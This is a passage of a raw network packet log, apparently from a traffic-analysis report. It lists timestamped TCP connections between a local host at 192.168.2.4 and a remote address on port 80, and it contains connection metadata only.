                                                                                  Jan 1, 2025 11:28:52.218398094 CET5012580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:52.222992897 CET8050124185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:52.223217964 CET8050125185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:52.223289013 CET5012480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:52.223347902 CET5012580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:52.223464966 CET5012580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:52.228286028 CET8050125185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:52.581047058 CET5012580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:52.586028099 CET8050125185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:52.869333982 CET8050125185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:52.909022093 CET5012580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:52.999875069 CET8050125185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:53.049635887 CET5012580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:53.133575916 CET5012680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:53.138462067 CET8050126185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:53.138520002 CET5012680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:53.138638020 CET5012680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:53.143342972 CET8050126185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:53.487217903 CET5012680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:53.493570089 CET8050126185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:53.778939962 CET8050126185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:53.830893040 CET5012680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:53.910923958 CET8050126185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:53.955883980 CET5012680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.039838076 CET5012680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.040997028 CET5012780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.044825077 CET8050126185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:54.044867039 CET5012680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.045829058 CET8050127185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:54.045883894 CET5012780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.046004057 CET5012780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.050195932 CET5012580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.050795078 CET8050127185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:54.393476963 CET5012780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.398384094 CET8050127185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:54.702841997 CET8050127185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:54.810867071 CET5012780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.833950043 CET8050127185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:54.924659014 CET5012780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.952764988 CET5012780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.953471899 CET5012880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.959682941 CET8050127185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:54.959742069 CET5012780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.959966898 CET8050128185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:54.960036039 CET5012880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.960140944 CET5012880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:54.966563940 CET8050128185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:55.315342903 CET5012880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:55.320224047 CET8050128185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:55.597754002 CET8050128185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:55.726216078 CET8050128185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:55.726516962 CET5012880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:55.842293024 CET5012880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:55.842915058 CET5012980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:55.847320080 CET8050128185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:55.847382069 CET5012880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:55.847700119 CET8050129185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:55.847798109 CET5012980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:55.847875118 CET5012980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:55.852648020 CET8050129185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:56.113075018 CET5012980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:56.113578081 CET5013080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:56.118371964 CET8050130185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:56.118439913 CET5013080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:56.118541956 CET5013080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:56.123292923 CET8050130185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:56.163322926 CET8050129185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:56.234402895 CET5013180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:56.239274979 CET8050131185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:56.239391088 CET5013180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:56.239485025 CET5013180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:56.244201899 CET8050131185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:56.299304962 CET8050129185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:56.299361944 CET5012980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:56.471590042 CET5013080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:56.476506948 CET8050130185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:56.476622105 CET8050130185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:56.596666098 CET5013180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:56.601541996 CET8050131185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:56.752249956 CET8050130185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:56.862925053 CET5013080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:56.875875950 CET8050131185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:56.881484985 CET8050130185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:56.924640894 CET5013180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:57.006108999 CET8050131185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:57.049648046 CET5013080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:57.123822927 CET5013080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:57.123928070 CET5013180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:57.124550104 CET5013280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:57.128885984 CET8050130185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:57.128946066 CET5013080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:57.129179001 CET8050131185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:57.129224062 CET5013180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:57.129441977 CET8050132185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:57.129508972 CET5013280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:57.129631042 CET5013280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:57.134432077 CET8050132185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:57.487349033 CET5013280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:57.492284060 CET8050132185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:57.794356108 CET8050132185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:57.862157106 CET5013280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:57.927877903 CET8050132185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:58.046180010 CET5013280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:58.046878099 CET5013380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:58.051642895 CET8050132185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:58.051673889 CET8050133185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:58.051702976 CET5013280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:58.051744938 CET5013380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:58.051821947 CET5013380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:58.056643009 CET8050133185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:58.409105062 CET5013380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:58.413964987 CET8050133185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:58.691745996 CET8050133185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:58.739748955 CET5013380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:58.822750092 CET8050133185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:58.927752972 CET5013380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:58.939965010 CET5013380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:58.940588951 CET5013480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:58.945039034 CET8050133185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:58.945126057 CET5013380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:58.945487022 CET8050134185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:58.945597887 CET5013480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:58.945703030 CET5013480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:58.950439930 CET8050134185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:59.301321983 CET5013480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:59.306147099 CET8050134185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:59.592786074 CET8050134185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:59.640104055 CET5013480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:59.724345922 CET8050134185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:59.850076914 CET5013480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:59.851286888 CET5013580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:59.855118990 CET8050134185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:59.855170965 CET5013480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:59.856128931 CET8050135185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:28:59.856190920 CET5013580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:59.856457949 CET5013580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:28:59.861247063 CET8050135185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:00.205960989 CET5013580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:00.210799932 CET8050135185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:00.521708965 CET8050135185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:00.659040928 CET5013580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:00.659693003 CET8050135185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:00.825769901 CET5013580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:00.826139927 CET5013680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:00.830763102 CET8050135185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:00.830914974 CET8050136185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:00.830998898 CET5013580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:00.831001043 CET5013680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:00.831130981 CET5013680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:00.835850000 CET8050136185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:01.191768885 CET5013680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:01.196603060 CET8050136185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:01.468264103 CET8050136185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:01.534034014 CET5013680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:01.598206997 CET8050136185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:01.727508068 CET5013680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:01.728527069 CET5013780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:01.732496977 CET8050136185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:01.733361959 CET8050137185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:01.733419895 CET5013680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:01.733448982 CET5013780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:01.734752893 CET5013780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:01.739504099 CET8050137185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:01.894646883 CET5013780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:01.895174026 CET5013880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:01.901731968 CET8050138185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:01.901803017 CET5013880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:01.901880980 CET5013880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:01.906698942 CET8050138185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:01.943283081 CET8050137185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.014848948 CET5013980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.019659042 CET8050139185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.021815062 CET5013980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.021928072 CET5013980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.026734114 CET8050139185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.200234890 CET8050137185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.200290918 CET5013780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.252852917 CET5013880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.257713079 CET8050138185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.257894993 CET8050138185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.377856970 CET5013980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.382704973 CET8050139185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.540538073 CET8050138185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.657104969 CET8050139185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.659039021 CET5013880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.670094967 CET8050138185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.737166882 CET5013980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.785334110 CET8050139185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.862166882 CET5013880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.901946068 CET5013980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.908406019 CET5013880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.908510923 CET5013980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.909182072 CET5014080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.913428068 CET8050138185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.913481951 CET5013880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.913713932 CET8050139185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.913758039 CET5013980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.914025068 CET8050140185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:02.914184093 CET5014080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.914294958 CET5014080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:02.919121981 CET8050140185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:03.268461943 CET5014080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:03.273267984 CET8050140185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:03.552181005 CET8050140185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:03.659034014 CET5014080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:03.682168961 CET8050140185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:03.797692060 CET5014080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:03.798235893 CET5014180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:03.802665949 CET8050140185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:03.802721024 CET5014080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:03.803041935 CET8050141185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:03.803127050 CET5014180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:03.803205013 CET5014180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:03.807931900 CET8050141185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:04.159091949 CET5014180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:04.163995028 CET8050141185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:04.440031052 CET8050141185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:04.534766912 CET5014180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:04.570213079 CET8050141185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:04.687326908 CET5014180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:04.687851906 CET5014280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:04.695087910 CET8050141185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:04.695099115 CET8050142185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:04.695142031 CET5014180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:04.695215940 CET5014280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:04.695296049 CET5014280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:04.701864958 CET8050142185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:05.049690962 CET5014280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:05.054550886 CET8050142185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:05.341133118 CET8050142185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:05.425780058 CET5014280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:05.471816063 CET8050142185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:05.534039021 CET5014280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:05.600433111 CET5014280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:05.601231098 CET5014380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:05.605499029 CET8050142185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:05.605540991 CET5014280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:05.606076002 CET8050143185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:05.606132030 CET5014380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:05.606247902 CET5014380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:05.610966921 CET8050143185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:05.956011057 CET5014380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:05.960901976 CET8050143185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:06.243604898 CET8050143185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:06.362277031 CET5014380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:06.373976946 CET8050143185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:06.497571945 CET5014380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:06.498770952 CET5014480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:06.502517939 CET8050143185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:06.503612995 CET8050144185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:06.503693104 CET5014480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:06.503694057 CET5014380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:06.503803968 CET5014480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:06.508609056 CET8050144185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:06.867765903 CET5014480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:06.872621059 CET8050144185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:07.150788069 CET8050144185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:07.279824972 CET8050144185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:07.281991005 CET5014480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:07.405102015 CET5014480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:07.405102968 CET5014580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:07.409954071 CET8050145185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:07.410120964 CET8050144185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:07.410197973 CET5014580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:07.410200119 CET5014480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:07.410274029 CET5014580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:07.415035963 CET8050145185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:07.676141024 CET5014680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:07.676194906 CET5014580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:07.680954933 CET8050146185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:07.681016922 CET5014680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:07.681133986 CET5014680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:07.685875893 CET8050146185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:07.727298975 CET8050145185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:07.797703981 CET5014780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:07.802608967 CET8050147185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:07.802659035 CET5014780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:07.802774906 CET5014780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:07.807568073 CET8050147185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:07.884279013 CET8050145185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:07.884320021 CET5014580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:08.034130096 CET5014680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:08.039021969 CET8050146185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:08.039108992 CET8050146185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:08.159236908 CET5014780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:08.164079905 CET8050147185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:08.317962885 CET8050146185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:08.424679041 CET5014680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:08.446157932 CET8050146185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:08.448710918 CET8050147185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:08.534049034 CET5014680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:08.583746910 CET8050147185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:08.585983992 CET5014780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:08.699975014 CET5014680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:08.700126886 CET5014780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:08.700577974 CET5014880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:08.704941034 CET8050146185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:08.705049038 CET5014680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:08.705261946 CET8050147185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:08.705373049 CET8050148185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:08.705418110 CET5014780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:08.705558062 CET5014880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:08.705621958 CET5014880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:08.710984945 CET8050148185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:09.049830914 CET5014880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:09.054714918 CET8050148185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:09.343269110 CET8050148185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:09.425827980 CET5014880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:09.470130920 CET8050148185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:09.524796963 CET5014880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:09.593569994 CET5014980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:09.598433971 CET8050149185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:09.598490000 CET5014980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:09.598582029 CET5014980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:09.603332996 CET8050149185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:09.956010103 CET5014980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:09.960855007 CET8050149185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:10.235394001 CET8050149185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:10.362166882 CET5014980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:10.362190008 CET8050149185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:10.477545023 CET5014880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:10.482218981 CET5014980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:10.482224941 CET5015080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:10.487010002 CET8050150185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:10.487221956 CET8050149185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:10.487246990 CET5015080192.168.2.4185.158.202.52
